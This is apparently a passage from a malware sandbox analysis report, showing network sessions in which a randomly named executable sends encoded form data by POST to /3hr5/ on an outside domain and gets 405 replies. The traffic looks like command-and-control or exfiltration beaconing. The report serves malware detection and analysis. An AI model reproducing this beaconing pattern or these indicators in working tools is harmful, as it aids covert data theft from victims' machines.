                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              91192.168.11.205022291.195.240.19808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:28:27.886938095 CET1162OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.engindenizyurdu.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.engindenizyurdu.com
                                                                                                                              Referer: http://www.engindenizyurdu.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 52 77 7a 31 74 30 30 4e 51 4c 62 6a 70 78 57 55 4d 66 42 35 76 62 76 42 4e 66 62 2b 69 2f 2b 4a 79 6f 6f 65 6b 61 2b 7a 43 4c 74 4f 6d 43 70 59 62 6e 76 54 76 37 6e 71 61 37 30 4b 77 6f 56 4c 77 55 31 36 47 46 44 45 68 6a 4c 34 48 4e 72 6b 71 2f 2f 55 33 52 6e 2f 4a 57 73 75 43 6f 63 33 57 37 61 37 66 7a 61 35 65 4e 49 78 44 74 33 63 4d 7a 43 76 68 70 54 69 4e 42 45 4e 35 6b 66 30 77 77 6c 54 56 49 47 39 4a 51 55 61 41 69 4a 72 50 4f 50 42 67 43 55 6b 68 62 50 2b 6d 6e 35 42 34 54 70 47 5a 6c 57 4d 56 78 54 4e 77 76 73 6c 4a 46 6e 4c 43 37 65 45 64 33 4a 43 5a 75 6a 61 64 73 6b 6d 66 47 70 57 54 71 76 52 48 58 76 47 62 7a 49 66 57 4e 72 74 42 47 4a 78 56 50 55 2f 39 64 33 73 39 49 68 44 71 59 70 58 68 38 71 37 59 4f 44 41 56 48 36 59 41 2f 72 4f 63 4a 57 52 35 36 2b 61 79 6d 4c 71 67 4b 55 37 34 5a 44 57 6a 32 73 65 47 4a 57 33 55 51 2b 6a 50 67 5a 37 6c 49 6a 75 6a 37 73 37 4b 2b 52 6c 62 30 4c 65 68 6b 30 41 4d 61 58 6e 44 42 64 4c 54 55 43 6e 2f 4a 52 78 77 39 58 55 53 45 67 51 70 56 74 70 66 65 4b 42 76 35 69 64 6e 4a 31 53 4b 43 33 7a 76 70 44 30 5a 35 53 67 77 74 47 52 6e 76 78 37 62 65 50 4a 74 6d 6a 51 51 70 69 38 47 2b 4d 69 59 31 7a 68 66 63 30 77 54 6c 5a 65 4b 6a 78 38 41 5a 75 6c 4a 4d 74 69 52 72 47 53 4e 59 4a 51 4d 55 32 57 5a 6a 53 39 6c 36 36 4b 4c 6d 61 71 66 4e 76 64 44 42 6e 41 68 79 50 78 4e 33 74 6d 46 2f 5a 79 42 39 32 64 73 7a 79 55 44 30 34 6a 69 34 37 55 45 6f 6a 2b 33 38 79 38 34 53 2b 79 48 71 74 54 4d 68 46 78 75 54 68 4c 51 6d 4f 36 6c 70 61 48 7a 57 2b 43 6d 48 39 67 41 34 4f 6c 56 64 57 30 6a 31 34 3d
                                                                                                                              Data Ascii: TZd=Rwz1t00NQLbjpxWUMfB5vbvBNfb+i/+Jyooeka+zCLtOmCpYbnvTv7nqa70KwoVLwU16GFDEhjL4HNrkq//U3Rn/JWsuCoc3W7a7fza5eNIxDt3cMzCvhpTiNBEN5kf0wwlTVIG9JQUaAiJrPOPBgCUkhbP+mn5B4TpGZlWMVxTNwvslJFnLC7eEd3JCZujadskmfGpWTqvRHXvGbzIfWNrtBGJxVPU/9d3s9IhDqYpXh8q7YODAVH6YA/rOcJWR56+aymLqgKU74ZDWj2seGJW3UQ+jPgZ7lIjuj7s7K+Rlb0Lehk0AMaXnDBdLTUCn/JRxw9XUSEgQpVtpfeKBv5idnJ1SKC3zvpD0Z5SgwtGRnvx7bePJtmjQQpi8G+MiY1zhfc0wTlZeKjx8AZulJMtiRrGSNYJQMU2WZjS9l66KLmaqfNvdDBnAhyPxN3tmF/ZyB92dszyUD04ji47UEoj+38y84S+yHqtTMhFxuThLQmO6lpaHzW+CmH9gA4OlVdW0j14=
                                                                                                                              Dec 4, 2023 15:28:28.069636106 CET353INHTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:28:27 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              92192.168.11.205022391.195.240.19808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:28:30.590428114 CET6484OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.engindenizyurdu.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.engindenizyurdu.com
                                                                                                                              Referer: http://www.engindenizyurdu.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 52 77 7a 31 74 30 30 4e 51 4c 62 6a 70 78 57 55 4d 66 42 35 76 62 76 42 4e 66 62 2b 69 2f 2b 4a 79 6f 6f 65 6b 61 2b 7a 43 4c 6c 4f 6e 78 78 59 61 41 37 54 75 37 6e 71 46 4c 30 4c 77 6f 56 53 77 55 74 2b 47 46 66 36 68 6d 58 34 47 65 54 6b 72 4d 48 55 68 42 6e 2b 56 47 73 6f 47 6f 63 64 57 37 57 56 66 33 33 4f 64 38 38 78 46 65 44 63 62 30 32 73 70 5a 53 70 4e 42 45 42 39 6b 66 4b 77 7a 49 57 56 49 61 39 4a 53 67 61 42 51 42 72 44 2f 50 42 36 69 55 6e 76 37 50 78 76 48 35 6b 34 54 39 34 5a 6c 57 32 56 31 72 4e 77 6f 34 6c 49 47 50 49 43 62 65 45 44 6e 4a 42 64 75 76 65 64 73 4a 6c 66 47 64 57 54 74 7a 52 48 33 76 47 65 52 67 59 52 74 72 76 4b 6d 49 78 52 50 59 6e 39 5a 6e 34 39 4b 74 44 72 6f 39 58 37 76 43 37 55 50 44 41 59 48 36 61 65 2f 72 5a 58 70 58 53 35 36 75 73 79 6d 72 63 67 4b 67 37 35 34 6a 57 6f 30 45 64 42 70 57 31 5a 41 2b 32 4c 67 56 6e 6c 49 53 31 6a 37 74 6d 4b 37 70 6c 62 46 37 65 67 68 55 42 63 36 58 67 49 68 63 52 46 6b 47 70 2f 4a 64 35 77 39 2b 54 53 48 4d 51 6f 31 74 70 61 38 69 43 6c 4a 69 61 71 70 31 41 53 69 32 72 76 70 50 43 5a 34 57 77 77 63 61 52 6d 62 56 37 63 4f 50 4b 70 47 6a 4c 62 4a 69 36 43 2b 4d 69 59 31 76 54 66 63 77 77 54 30 68 65 4b 51 5a 38 4c 75 61 6c 50 4d 74 6b 52 72 47 44 4e 59 45 37 4d 55 2b 4a 5a 6a 69 58 6c 35 57 4b 4c 30 79 71 59 4a 62 61 56 42 6e 46 6c 79 50 6d 44 58 67 6b 46 37 42 36 42 39 6d 33 74 42 6d 55 43 31 45 6a 7a 6f 37 4c 43 49 6a 35 30 38 7a 6b 79 79 7a 7a 48 70 5a 74 4d 67 42 68 75 52 68 4c 41 68 50 47 2b 74 53 71 6f 77 61 33 6e 69 4a 59 4c 5a 61 66 4a 34 43 51 78 79 4f 6d 6f 52 7a 63 76 6e 74 34 49 57 67 6e 62 43 6d 32 64 52 2b 46 72 52 63 2f 36 67 47 63 31 46 61 34 6c 46 30 6e 37 71 4d 78 37 6b 68 58 75 43 48 32 62 4c 7a 41 2f 4a 7a 72 32 49 49 56 74 38 73 56 79 51 4b 4b 76 57 61 72 54 57 76 64 50 62 73 31 72 30 6a 6e 50 50 33 2b 67 47 39 53 64 61 7a 65 56 2b 44 5a 4e 2f 4d 2b 41 66 75 30 49 65 37 2f 50 6b 58 63 6b 56 2b 41 55 36 4d 55 72 71 76 6f 69 4c 33 68 64 6a 43 65 73 57 55 45 51 4a 71 67 57 6e 53 4d 42 70 56 34 53 49 75 44 4b 34 67 65 78 6d 7a 51 33 30 4b 30 36 64 66 34 61 73 54 37 75 2f 58 45 6b 2f 43 35 2f 50 4d 78 6d 76 73 6c 57 75 36 74 58 4d 50 57 63 74 76 34 63 47 4e 51 44 4a 43 65 4e 33 38 34 54 67 44 4c 4f 59 38 45 44 44 56 2f 4f 4e 50 33 38 54 62 47 72 7a 30 69 36 43 56 47 6b 33 59 2b 63 7a 4b 73 31 67 6e 52 67 71 68 4e 67 4f 33 71 35 35 59 6a 2b 4b 41 7a 47 7a 52 31 74 4e 52 46 76 48 35 42 57 47 56 7a 6c 76 4c 48 51 75 5a 4c 54 46 51 77 63 52 42 6b 6a 63 52 6b 41 2f 36 52 70 76 63 76 36 39 67 53 36 63 57 66 49 47 6b 6b 30 61 4f 45 58 64 67 7a 62 47 6b 78 6a 7a 37 2b 42 38 50 44 2b 62 79 52 59 68 62 63 59 6a 66 69 70 67 6d 66 4f 32 4e 79 62 49 43 39 4d 76 62 70 56 4c 6c 78 71 33 4b 46 6b 31 66 43 52 74 4c 57 36 54 66 6f 46 6c 77 39 74 5a 4f 65 58 58 37 4b 36 54 34 34 4a 67 6b 39 6b 57 2b 2f 4c 58 72 42 30 36 49 4a 47 6a 73 74 2f 77 67 4b 79 49 32 47 38 55 57 4f 70 73 49 79 30 72 4e 53 79 79 39 55 55 34 55 64 62 46 2b 38 47 36 34 4b 4c 42 59 56 6b 41 53 4f 39 46 76 4b 44 75 71 77 30 73 61 38 68 7a 71 66 31 6d 42 48 46 63 39 48 37 6e 76 71 35 32 68 4e 48 56 70 7a 79 6b 4a 76 42 54 58 6a 4c 4d 72 49 51 69 73 31 6f 53 71 61 73 52 41 2b 47 4f 4d 30 51 62 69 58 6f 5a 39 37 58 58 39 62 49 46 45 57 4e 57 78 51 2f 72 67 64 31 2b 49 62 4c 6b 4d 42 4e 34 6c 49 47 64 50 56 53 63 67 77 61 32 43 79 50 63 6d 4b 65 66 55 6f 2b 33 73 42 58 69 49 4c 39 49 78 74 62 6b 31 77 73 6b 58 6e 64 4a 69 76 37 32 72 5a 70 52 35 44 30 43 53 39 56 58 2b 44 2b 68 46 70 6b 48 32 4a 50 49 7a 6e 44 66 6c 79 59 51 73 57 4b 34 38 78 4d 71 4d 66 41 4b 6c 65 71 58 38 6f 7a 47 51 2b 2f 71 75 66 51 47 43 6c 47 59 6a 76 74 71 42 46 4d 45 49 33 4d 4a 69 70 71 69 4d 32 7a 4f 69 48 4c 4b 4a 4a 55 62 37 59 42 49 4b 56 35 2f 33 2f 35 4e 62 58 64 31 30 77 30 73 6d 56 44 34 55 6f 6c 62 58 35 46 42 4d 49 6a 44 58 2f 5a 6b 77 4a 36 67 6c 4d 35 53 69 4a 72 6d 54 57 2f 71 38 4d 30 4e 41 62 4c 68 71 4d 67 49 48 50 48 30 47 52 57 59 59 74 31 62 4e 78 36 4f 50 76 69 45 77 6f 72 6e 6d 58 6f 35 72 46 4d 4c 76 71 4b 51 37 6a 35 30 31 48 55 33 6a 61 79 53 6e 41 48 52 7a 70 2b 64 42
                                                                                                                              Data Ascii: TZd=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
                                                                                                                              Dec 4, 2023 15:28:30.590512037 CET6484OUTData Raw: 37 62 6b 52 6f 41 51 53 6e 64 42 67 30 71 6d 6d 62 53 4b 73 73 6e 2f 39 7a 33 4d 42 4d 73 44 79 6a 6a 4e 30 32 52 44 46 35 5a 55 39 6b 66 4c 43 6c 5a 68 65 4a 47 30 54 6f 32 41 31 37 69 65 75 33 66 41 6d 33 48 30 52 37 6d 31 54 61 73 44 4c 78 68
                                                                                                                              Data Ascii: 7bkRoAQSndBg0qmmbSKssn/9z3MBMsDyjjN02RDF5ZU9kfLClZheJG0To2A17ieu3fAm3H0R7m1TasDLxhoRVV138N/fRtmpyIACeW+JnqxN1hOk3jFvKdvFq1PxwdMErzYJ/kr+olJIewIwmJFAmVcbG4cDWwwwuGVhPHsGX5rTnwIx59/4QRinZNkUGBjDuhFAEl7A8zZiZX6yhPfwnxHISIKkNsBQRKfBEmXAISyovbSeV2C
                                                                                                                              Dec 4, 2023 15:28:30.772437096 CET2626OUTData Raw: 62 48 6b 35 6f 38 31 68 4c 41 41 6c 33 36 72 75 50 33 67 67 7a 2f 4d 6c 39 39 32 79 62 37 33 53 4e 77 35 51 42 6f 77 63 45 4c 35 4c 4f 69 61 4f 36 73 43 6c 53 45 48 65 68 65 5a 4c 4a 44 51 41 57 41 53 71 76 74 73 64 71 4d 48 2b 76 7a 49 33 4d 6d
                                                                                                                              Data Ascii: bHk5o81hLAAl36ruP3ggz/Ml992yb73SNw5QBowcEL5LOiaO6sClSEHeheZLJDQAWASqvtsdqMH+vzI3MmTE9noG+lDu7NSmiPnUURQwRhba8rIzHWbYlN70RObStqWvXclnwUP9t6C0xgH+QWc6tySaikbI1S72LusBgt3bZQ/5DQ717lY5OsUmjeedu5u6LY1mNBJ2Ppy3qsQDRIt61wxnxVkLGh7Su64MWar+/tgjs3JubAr
                                                                                                                              Dec 4, 2023 15:28:30.772576094 CET5198OUTData Raw: 45 4a 48 77 71 79 6c 51 78 59 41 6c 66 39 67 77 66 37 4a 44 56 30 56 75 50 75 44 47 31 34 7a 56 55 31 4b 77 65 50 54 6b 69 39 45 2b 4b 4f 59 55 6d 6d 55 2b 75 6e 6c 6e 6d 45 66 72 59 32 4a 35 55 77 72 43 39 2b 35 2b 4d 42 6e 36 76 73 50 46 34 75
                                                                                                                              Data Ascii: EJHwqylQxYAlf9gwf7JDV0VuPuDG14zVU1KwePTki9E+KOYUmmU+unlnmEfrY2J5UwrC9+5+MBn6vsPF4u6aMiDj2u3566wjJfGVOMyxI9dilS4LGCpXar8DbGZnwrPWDNZkUtQZG3LEEGKYaW1rPM7BEzAb+ZmEuLoAbuIY8ZGJxyrK1OYmzTpIXltFMhL+Op9e8KGVfS1HmFWwKVDUhKiOa69Oj0OdI/wYsiGSHv0W8pYqLoc
                                                                                                                              Dec 4, 2023 15:28:30.772779942 CET2626OUTData Raw: 37 4e 5a 68 62 49 4c 35 50 54 4f 45 6b 65 4a 5a 41 56 77 6e 77 4e 51 56 6d 75 72 59 39 64 48 46 61 44 52 52 51 50 6d 56 57 46 6d 65 56 45 6e 50 41 39 62 63 34 74 79 4b 58 32 45 52 63 34 48 4a 49 4d 65 6c 57 6f 2f 47 4e 6b 4c 43 42 30 4b 6e 43 4a
                                                                                                                              Data Ascii: 7NZhbIL5PTOEkeJZAVwnwNQVmurY9dHFaDRRQPmVWFmeVEnPA9bc4tyKX2ERc4HJIMelWo/GNkLCB0KnCJ6sc9X2RBPIeGnkM0KfvhQ3j5kkryke942bNP+YlDb1fLDk2lNvY+W1FVhNY7CDm7IF+ehxL/qCIaT3d4YVN34CbgPhjqHpMxdA0DUa6pSO8jAKta9P5Qeu1+yB5Kp64c666UtX5cWJYM5Sc79Q4m+dee2ha9ykAqK
                                                                                                                              Dec 4, 2023 15:28:30.772953033 CET353INHTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:28:30 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                                                                                                                              Dec 4, 2023 15:28:30.772969007 CET5198OUTData Raw: 4f 48 7a 75 33 64 6b 38 6f 44 65 2f 51 78 48 7a 69 62 72 41 7a 6a 47 41 4c 75 2f 4e 6f 58 35 41 77 38 50 35 76 79 66 72 59 2f 42 36 6b 58 74 4a 74 53 59 4b 77 6f 58 30 5a 74 70 66 4d 51 55 61 33 73 7a 58 35 6c 2b 7a 69 69 6c 65 5a 4a 32 58 6b 77
                                                                                                                              Data Ascii: OHzu3dk8oDe/QxHzibrAzjGALu/NoX5Aw8P5vyfrY/B6kXtJtSYKwoX0ZtpfMQUa3szX5l+ziileZJ2XkwrDI+78fSO8rsP011Yp2T0h/VXVTXCz8hHj1UnxlaviKZLvVW2GFQhabg8ri9qOVCtJP/Lm88dsbqIdOeGq/JypCcP/AYFa0fKBfcrMbSi4RziXkLJxNPulLI42jiG67FX0teuXTFOxjkya8uaveqdCF7+Mwq5CK7m
                                                                                                                              Dec 4, 2023 15:28:30.773128033 CET6484OUTData Raw: 37 79 57 67 6b 6e 47 46 73 57 43 4f 56 6c 34 74 47 57 46 76 62 77 64 39 63 7a 56 55 4f 78 4a 5a 34 7a 49 6f 4a 47 66 69 79 74 38 66 37 4d 44 50 73 76 48 74 38 39 73 72 56 46 36 64 41 33 70 77 51 73 38 4c 74 73 6f 39 78 66 64 4d 38 4b 79 35 76 6b
                                                                                                                              Data Ascii: 7yWgknGFsWCOVl4tGWFvbwd9czVUOxJZ4zIoJGfiyt8f7MDPsvHt89srVF6dA3pwQs8Ltso9xfdM8Ky5vkFCEHGRsCG/KG5GkW17A9fArEvYATJg+/z9B2idZJSYV/D2AKsfe7E0psrV8on7Y6+dzNcdPW4eVGT7FTUKJLUHbJ4Cib103ZP+LibtwvWnHf3S+r5CGyR9U6NOJdvBawFvmOOC42WzZ5ILinFu069yfvfrx23iNQ6
                                                                                                                              Dec 4, 2023 15:28:30.773241043 CET3912OUTData Raw: 53 42 48 74 31 49 38 45 78 4e 47 6a 65 2f 6c 59 45 65 57 6b 56 31 67 44 7a 32 49 49 76 6f 68 63 70 70 41 78 6a 4f 52 4e 79 58 46 35 6a 4d 6b 62 4b 55 72 6f 79 47 6e 79 32 53 70 41 67 65 45 5a 77 78 4c 36 42 46 75 4c 6c 71 49 61 55 6f 49 6e 4f 61
                                                                                                                              Data Ascii: SBHt1I8ExNGje/lYEeWkV1gDz2IIvohcppAxjORNyXF5jMkbKUroyGny2SpAgeEZwxL6BFuLlqIaUoInOaU6DDB5wvOMaWzrmvE9G3qQ6GGc27qMlcklh6k8z42OpgUGJ8aONVqSUDCzkw4dI+klUM0AqavRBAGDOp9bZQWC2KF1rSqMI7qGceHU1jSvQHNLFpX8kRwIXO2zVoFJ+VoEFT/Cylc9jBAapz/bKJ66Puyr5uyU2+y
